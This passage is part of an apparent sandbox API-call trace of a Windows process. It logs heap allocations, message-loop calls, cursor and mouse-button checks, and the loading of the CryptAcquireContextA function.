wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53050 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c98 [0250.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc38 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe53050 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc88 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8868 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53020 [0250.176] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0xbe0000) returned 1 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf6288 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dcb0 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8790 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53020 [0250.176] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8790 | out: hHeap=0xbe0000) returned 1 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dcd8 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8790 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01a00 [0250.176] PeekMessageW (in: lpMsg=0x8bf1fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf1fc) returned 0 [0250.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53010 [0250.176] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87a8 [0250.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6258 [0250.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8760 [0250.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53010 [0250.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8760 | out: hHeap=0xbe0000) returned 1 [0250.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6258 | out: hHeap=0xbe0000) returned 1 [0250.177] PeekMessageW (in: lpMsg=0x8bf1fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf1fc) returned 1 [0250.177] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf1fc) returned 0 [0250.177] TranslateMessage (lpMsg=0x8bf1fc) returned 0 [0250.178] DispatchMessageW (lpMsg=0x8bf1fc) returned 0x0 [0250.178] GetForegroundWindow () returned 0x30150 [0250.178] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.178] GetCursorPos (in: lpPoint=0x8bf038 | out: lpPoint=0x8bf038*(x=875, y=503)) returned 1 [0250.178] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf038 | out: lpPoint=0x8bf038) returned 1 [0250.178] GetAsyncKeyState (vKey=1) returned 0 [0250.178] GetAsyncKeyState (vKey=2) returned 0 [0250.178] PeekMessageW (in: lpMsg=0x8bf1fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf1fc) returned 0 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01a00 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8790 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dcd8 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dcb0 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6288 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dc38 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8868 | out: hHeap=0xbe0000) returned 1 [0250.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dc88 | out: hHeap=0xbe0000) returned 1 [0250.178] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.178] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc88 [0250.178] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8868 [0250.178] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53050 [0250.179] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8868 | out: hHeap=0xbe0000) returned 1 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc38 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8868 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6288 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53020 [0250.179] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6288 | out: hHeap=0xbe0000) returned 1 [0250.179] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0xbe0000) returned 1 [0250.179] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dcb0 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6288 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53020 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8790 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6258 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53010 [0250.179] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6258 | out: hHeap=0xbe0000) returned 1 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dcd8 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6258 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c98 [0250.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.179] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.179] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8760 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01a00 [0250.180] PeekMessageW (in: lpMsg=0x8bee04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bee04) returned 0 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52ff0 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fe0 [0250.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fe0 | out: hHeap=0xbe0000) returned 1 [0250.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01a00 | out: hHeap=0xbe0000) returned 1 [0250.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8760 | out: hHeap=0xbe0000) returned 1 [0250.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8760 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8778 [0250.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6228 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8730 [0250.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8748 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf61f8 [0250.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8700 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8718 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf61c8 [0250.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86d0 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86e8 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6198 [0250.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01a00 [0250.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dcd8 | out: hHeap=0xbe0000) returned 1 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86a0 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86b8 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6168 [0250.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8670 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8688 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6138 [0250.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8640 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53000 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8658 [0250.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fe0 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 [0250.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8610 | out: hHeap=0xbe0000) returned 1 [0250.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fe0 | out: hHeap=0xbe0000) returned 1 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dcd8 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fe0 [0250.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fd0 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8610 | out: hHeap=0xbe0000) returned 1 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fd0 | out: hHeap=0xbe0000) returned 1 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fd0 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fc0 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8610 | out: hHeap=0xbe0000) returned 1 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fc0 | out: hHeap=0xbe0000) returned 1 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fc0 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fb0 [0250.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8610 | out: hHeap=0xbe0000) returned 1 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.184] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fb0 | out: hHeap=0xbe0000) returned 1 [0250.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fb0 [0250.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fa0 [0250.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 [0250.184] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.184] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.184] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8610 | out: hHeap=0xbe0000) returned 1 [0250.184] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fa0 | out: hHeap=0xbe0000) returned 1 [0250.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fa0 [0250.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 [0250.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f90 [0250.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.185] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8610 | out: hHeap=0xbe0000) returned 1 [0250.185] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.185] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.185] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f90 | out: hHeap=0xbe0000) returned 1 [0250.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f90 [0250.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0250.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xe40ef0 [0250.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0xe40ef0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0250.185] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd00 [0250.185] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ef0 | out: hHeap=0xbe0000) returned 1 [0250.186] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContext") returned 0x0 [0250.186] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dd00 | out: hHeap=0xbe0000) returned 1 [0250.186] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f90 | out: hHeap=0xbe0000) returned 1 [0250.186] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f90 [0250.186] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c98 [0250.186] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.186] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0250.186] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x15) returned 0xe40ef0 [0250.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0xe40ef0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0250.186] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.186] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd00 [0250.186] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ef0 | out: hHeap=0xbe0000) returned 1 [0250.186] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContextA") returned 0x74f291dd [0250.186] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dd00 | out: hHeap=0xbe0000) returned 1 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f90 | out: hHeap=0xbe0000) returned 1 [0250.187] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd00 [0250.187] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f90 [0250.187] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.187] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f80 [0250.187] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f70 [0250.187] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f60 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f90 | out: hHeap=0xbe0000) returned 1 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f70 | out: hHeap=0xbe0000) returned 1 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f60 | out: hHeap=0xbe0000) returned 1 [0250.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dd00 | out: hHeap=0xbe0000) returned 1 [0250.187] CryptAcquireContextA (in: phProv=0x8bedd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8bedd8*=0xc415b8) returned 1 [0250.188] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f70 [0250.188] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe766e0 [0250.188] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40f30 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 